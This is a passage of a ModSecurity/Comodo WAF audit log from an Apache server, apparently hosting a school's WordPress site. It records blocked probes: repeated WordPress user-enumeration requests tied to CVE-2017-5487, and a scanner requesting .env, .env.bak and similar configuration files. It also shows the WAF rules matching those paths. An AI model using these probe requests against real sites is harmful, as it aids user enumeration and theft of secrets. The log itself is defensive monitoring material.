"/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748553237255529 4010 (- - -) Stopwatch2: 1748553237255529 4010; combined=1728, p1=599, p2=1098, p3=0, p4=0, p5=31, sr=94, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --19cea60e-Z-- --ad41ac08-A-- [30/May/2025:04:40:51 +0700] aDjUY7W504ObxUT6RrzvcQAAAAA 103.236.140.4 42254 103.236.140.4 8181 --ad41ac08-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 119.148.41.57 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 119.148.41.57 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --ad41ac08-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ad41ac08-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748554851349607 3183 (- - -) Stopwatch2: 1748554851349607 3183; combined=1344, p1=484, p2=826, p3=0, p4=0, p5=34, sr=94, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ad41ac08-Z-- --aab2de24-A-- [30/May/2025:05:42:50 +0700] aDji6pxu2QkuXt3B9jaN2gAAAJc 103.236.140.4 42788 103.236.140.4 8181 --aab2de24-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 117.2.59.165 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 117.2.59.165 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --aab2de24-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --aab2de24-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748558570413877 3694 (- - -) Stopwatch2: 1748558570413877 3694; combined=1533, p1=535, p2=960, p3=0, p4=0, p5=37, sr=105, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --aab2de24-Z-- --b2871639-A-- [30/May/2025:06:17:27 +0700] aDjrB7W504ObxUT6RrzwzwAAABI 103.236.140.4 47722 103.236.140.4 8181 --b2871639-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 111.90.182.131 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 111.90.182.131 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --b2871639-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b2871639-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748560647345960 2590 (- - -) Stopwatch2: 1748560647345960 2590; combined=1200, p1=414, p2=712, p3=0, p4=0, p5=74, sr=91, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b2871639-Z-- --26cbe109-A-- [30/May/2025:06:19:11 +0700] aDjrb7W504ObxUT6Rrzw1AAAAAE 103.236.140.4 47746 103.236.140.4 8181 --26cbe109-B-- GET /.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 31.56.56.147 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 31.56.56.147 X-Forwarded-Proto: http Connection: close User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 Accept: */* --26cbe109-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --26cbe109-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748560751140202 801 (- - -) Stopwatch2: 1748560751140202 801; combined=312, p1=274, p2=0, p3=0, p4=0, p5=38, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --26cbe109-Z-- --2679e05e-A-- [30/May/2025:07:07:19 +0700] aDj2t7W504ObxUT6Rrzy4QAAAAk 103.236.140.4 52382 103.236.140.4 8181 --2679e05e-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 202.4.126.1 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 202.4.126.1 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --2679e05e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --2679e05e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748563639361334 3157 (- - -) Stopwatch2: 1748563639361334 3157; combined=1384, p1=478, p2=877, p3=0, p4=0, p5=29, sr=137, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2679e05e-Z-- --3cca6937-A-- [30/May/2025:08:20:46 +0700] aDkH7oWl_OZMPH_FZ2DLXAAAAMo 103.236.140.4 53614 103.236.140.4 8181 --3cca6937-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 138.122.164.117 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 138.122.164.117 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --3cca6937-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --3cca6937-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748568046227703 3665 (- - -) Stopwatch2: 1748568046227703 3665; combined=1612, p1=567, p2=1014, p3=0, p4=0, p5=31, sr=126, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3cca6937-Z-- --0fbfed1d-A-- [30/May/2025:08:50:47 +0700] aDkO97W504ObxUT6RrzzygAAAAM 103.236.140.4 54128 103.236.140.4 8181 --0fbfed1d-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 187.109.123.247 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 187.109.123.247 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --0fbfed1d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --0fbfed1d-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748569847537946 2803 (- - -) Stopwatch2: 1748569847537946 2803; combined=1259, p1=442, p2=787, p3=0, p4=0, p5=30, sr=90, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0fbfed1d-Z-- --dfacca0d-A-- [30/May/2025:09:34:30 +0700] aDkZNrW504ObxUT6Rrz0pwAAABc 103.236.140.4 55656 103.236.140.4 8181 --dfacca0d-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 159.65.131.160 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 159.65.131.160 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --dfacca0d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --dfacca0d-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748572470325546 3252 (- - -) Stopwatch2: 1748572470325546 3252; combined=1424, p1=484, p2=908, p3=0, p4=0, p5=32, sr=80, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --dfacca0d-Z-- --8abf495d-A-- [30/May/2025:09:56:05 +0700] aDkeRbW504ObxUT6Rrz0wwAAABY 103.236.140.4 55856 103.236.140.4 8181 --8abf495d-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 132.226.159.101 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 132.226.159.101 X-Forwarded-Proto: http Connection: close accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 user-agent: Mozilla/5.0 (Unknown; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) PhantomJS/2.0.0 Safari/538.1 accept-language: en-US,en;q=0.5 upgrade-insecure-requests: 1 --8abf495d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --8abf495d-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748573765240478 756 (- - -) Stopwatch2: 1748573765240478 756; combined=310, p1=273, p2=0, p3=0, p4=0, p5=37, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8abf495d-Z-- --54d0700d-A-- [30/May/2025:09:56:05 +0700] aDkeRbW504ObxUT6Rrz0xAAAABg 103.236.140.4 55858 103.236.140.4 8181 --54d0700d-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 132.226.159.101 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 132.226.159.101 X-Forwarded-Proto: http Connection: close accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 user-agent: Mozilla/5.0 (Unknown; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) PhantomJS/2.0.0 Safari/538.1 accept-language: en-US,en;q=0.5 upgrade-insecure-requests: 1 --54d0700d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --54d0700d-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748573765481256 771 (- - -) Stopwatch2: 1748573765481256 771; combined=334, p1=298, p2=0, p3=0, p4=0, p5=36, sr=115, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --54d0700d-Z-- --8f906116-A-- [30/May/2025:09:56:05 +0700] aDkeRbW504ObxUT6Rrz0xQAAAAM 103.236.140.4 55860 103.236.140.4 8181 --8f906116-B-- GET /.env.dist HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 132.226.159.101 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 132.226.159.101 X-Forwarded-Proto: http Connection: close accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 user-agent: Mozilla/5.0 (Unknown; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) PhantomJS/2.0.0 Safari/538.1 accept-language: en-US,en;q=0.5 upgrade-insecure-requests: 1 --8f906116-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --8f906116-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748573765823759 719 (- - -) Stopwatch2: 1748573765823759 719; combined=257, p1=224, p2=0, p3=0, p4=0, p5=33, sr=69, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8f906116-Z-- --99cc9a72-A-- [30/May/2025:09:56:06 +0700] aDkeRhNBDSvkc-tIZOnfRwAAAEk 103.236.140.4 55862 103.236.140.4 8181 --99cc9a72-B-- GET /.env.dist HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 132.226.159.101 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 132.226.159.101 X-Forwarded-Proto: http Connection: close accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 user-agent: Mozilla/5.0 (Unknown; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) PhantomJS/2.0.0 Safari/538.1 accept-language: en-US,en;q=0.5 upgrade-insecure-requests: 1 --99cc9a72-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --99cc9a72-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748573766064454 638 (- - -) Stopwatch2: 1748573766064454 638; combined=253, p1=222, p2=0, p3=0, p4=0, p5=31, sr=68, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --99cc9a72-Z-- --691cc972-A-- [30/May/2025:09:56:06 +0700] aDkeRhNBDSvkc-tIZOnfSAAAAE0 103.236.140.4 55864 103.236.140.4 8181 --691cc972-B-- GET /.env.bak HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 132.226.159.101 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 132.226.159.101 X-Forwarded-Proto: http Connection: close accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 user-agent: Mozilla/5.0 (Unknown; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) PhantomJS/2.0.0 Safari/538.1 accept-language: en-US,en;q=0.5 upgrade-insecure-requests: 1 --691cc972-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --691cc972-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748573766406768 620 (- - -) Stopwatch2: 1748573766406768 620; combined=249, p1=216, p2=0, p3=0, p4=0, p5=33, sr=65, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --691cc972-Z-- --daa8542f-A-- [30/May/2025:09:56:06 +0700] aDkeRhNBDSvkc-tIZOnfSQAAAFg 103.236.140.4 55866 103.236.140.4 8181 --daa8542f-B-- GET /.env.bak HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 132.226.159.101 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 132.226.159.101 X-Forwarded-Proto: http Connection: close accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 user-agent: Mozilla/5.0 (Unknown; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) PhantomJS/2.0.0 Safari/538.1 accept-language: en-US,en;q=0.5 upgrade-insecure-requests: 1 --daa8542f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --daa8542f-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748573766647268 659 (- - -) Stopwatch2: 1748573766647268 659; combined=255, p1=222, p2=0, p3=0, p4=0, p5=33, sr=66, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --daa8542f-Z-- --e88ab73a-A-- [30/May/2025:09:56:06 +0700] aDkeRpxu2QkuXt3B9jaSFwAAAJY 103.236.140.4 55868 103.236.140.4 8181 --e88ab73a-B-- GET /.env.dev.local HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 132.226.159.101 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 132.226.159.101 X-Forwarded-Proto: http Connection: close accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 user-agent: Mozilla/5.0 (Unknown; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) PhantomJS/2.0.0 Safari/538.1 accept-language: en-US,en;q=0.5 upgrade-insecure-requests: 1 --e88ab73a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e88ab73a-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748573766989528 670 (- - -) Stopwatch2: 1748573766989528 670; combined=260, p1=226, p2=0, p3=0, p4=0, p5=34, sr=67, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e88ab73a-Z-- --b5da7333-A-- [30/May/2025:09:56:07 +0700] aDkeRxNBDSvkc-tIZOnfSgAAAE8 103.236.140.4 55870 103.236.140.4 8181 --b5da7333-B-- GET /.env.dev.local HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 132.226.159.101 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 132.226.159.101 X-Forwarded-Proto: http Connection: close accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 user-agent: Mozilla/5.0 (Unknown; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) PhantomJS/2.0.0 Safari/538.1 accept-language: en-US,en;q=0.5 upgrade-insecure-requests: 1 --b5da7333-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b5da7333-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748573767230286 684 (- - -) Stopwatch2: 1748573767230286 684; combined=281, p1=249, p2=0, p3=0, p4=0, p5=32, sr=83, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b5da7333-Z-- --7f70dc14-A-- [30/May/2025:09:56:07 +0700] aDkeRxNBDSvkc-tIZOnfSwAAAE4 103.236.140.4 55872 103.236.140.4 8181 --7f70dc14-B-- GET /.env.development.local HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 132.226.159.101 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 132.226.159.101 X-Forwarded-Proto: http Connection: close accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 user-agent: Mozilla/5.0 (Unknown; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) PhantomJS/2.0.0 Safari/538.1 accept-language: en-US,en;q=0.5 upgrade-insecure-requests: 1 --7f70dc14-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --7f70dc14-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748573767572156 677 (- - -) Stopwatch2: 1748573767572156 677; combined=297, p1=266, p2=0, p3=0, p4=0, p5=31, sr=80, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7f70dc14-Z-- --bf4d9421-A-- [30/May/2025:09:56:07 +0700] aDkeR5xu2QkuXt3B9jaSGAAAAJg 103.236.140.4 55874 103.236.140.4 8181 --bf4d9421-B-- GET /.env.development.local HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 132.226.159.101 X-Forwarded-Host: 103.236.140.4 